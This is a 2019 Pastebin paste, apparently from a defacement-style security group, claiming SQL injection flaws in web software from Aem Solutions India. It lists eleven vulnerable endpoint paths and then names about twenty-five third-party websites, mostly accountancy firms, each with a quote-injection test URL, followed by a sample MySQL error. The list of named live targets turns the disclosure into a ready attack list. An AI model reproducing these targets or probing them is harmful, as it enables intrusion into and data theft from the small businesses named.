Advertisement
KingSkrupellos

Aem Solutions India SQL Injection

Mar 7th, 2019
150
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.60 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Aem Solutions India SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 08/03/2019
  7. # Vendor Homepage : aemsolutions.in
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  12. Special Elements used in an SQL Command ('SQL Injection') ]
  13. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  14. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  15. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  16.  
  17. ####################################################################
  18.  
  19. # Impact :
  20. ***********
  21. Aem Solutions India is prone to an SQL-injection vulnerability because it fails to sufficiently
  22.  
  23. sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow
  24.  
  25. an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities
  26.  
  27. in the underlying database. A remote attacker can send a specially crafted request to the vulnerable
  28.  
  29. application and execute arbitrary SQL commands in application`s database. Further exploitation
  30.  
  31. of this vulnerability may result in unauthorized data manipulation.
  32.  
  33. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  34.  
  35. ####################################################################
  36.  
  37. # SQL Injection Exploit :
  38. **********************
  39. /page.php?id=[SQL Injection]
  40.  
  41. /view_circular.php?id=[SQL Injection]
  42.  
  43. /vat.php?page=[SQL Injection]
  44.  
  45. /vat_states.php?cat_id=[SQL Injection]
  46.  
  47. /act_rules.php?page=[SQL Injection]
  48.  
  49. /utilities.php?page=[SQL Injection]
  50.  
  51. /forms.php?cat_id=[SQL Injection]
  52.  
  53. /calculators.php?id=[SQL Injection]
  54.  
  55. /circular_notifications.php?cat_id=[SQL Injection]
  56.  
  57. /bulletins.php?page=[SQL Injection]
  58.  
  59. /software_details.php?id=[SQL Injection]
  60.  
  61. ####################################################################
  62.  
  63. # Example Vulnerable Sites :
  64. *************************
  65. [+] cacpa.in/page.php?id=9%27
  66.  
  67. [+] rbaca.co.in/page.php?id=6%27
  68.  
  69. [+] cadmc.in/page.php?id=2%27
  70.  
  71. [+] aadisol.in/forms.php?cat_id=17%27
  72.  
  73. [+] amitrguptaassociates.com/forms.php?cat_id=2%27
  74.  
  75. [+] rajksri.com/forms.php?cat_id=14%27
  76.  
  77. [+] njandco.in/forms.php?cat_id=17%27
  78.  
  79. [+] gargtaxsolutions.com/forms.php?cat_id=62%27
  80.  
  81. [+] akasassociates.com/forms.php?cat_id=62%27
  82.  
  83. [+] bask.co.in/forms.php?cat_id=44%27
  84.  
  85. [+] vbrindia.com/forms.php?cat_id=10%27
  86.  
  87. [+] cahukamsingh.com/forms.php?cat_id=2%27
  88.  
  89. [+] csalok.com/forms.php?cat_id=62%27
  90.  
  91. [+] rcgargca.com/forms.php?cat_id=10%27
  92.  
  93. [+] delhivatconsultants.com/forms.php?cat_id=16%27
  94.  
  95. [+] caykc.com/forms.php?cat_id=1%27
  96.  
  97. [+] pnaindia.in/forms.php?cat_id=3%27
  98.  
  99. [+] cavijayrastogi.com/forms.php?cat_id=34%27
  100.  
  101. [+] kbassociate.com/forms.php?cat_id=17%27
  102.  
  103. [+] caka.in/forms.php?cat_id=10%27
  104.  
  105. [+] mgaca.net/forms.php?cat_id=10%27
  106.  
  107. [+] dpacaonline.com/forms.php?cat_id=67%27
  108.  
  109. [+] pguptaco.com/forms.php?cat_id=2%27
  110.  
  111. [+] mkmca.com/forms.php?cat_id=30%27
  112.  
  113. [+] ssahoo.com/forms.php?cat_id=10%27
  114.  
  115. ####################################################################
  116.  
  117. # Example SQL Database Error :
  118. ****************************
  119. You have an error in your SQL syntax; check the manual that corresponds to
  120. your MySQL server version for the right syntax to use near ''9''' at line 1
  121.  
  122. ####################################################################
  123.  
  124. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  125.  
  126. ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement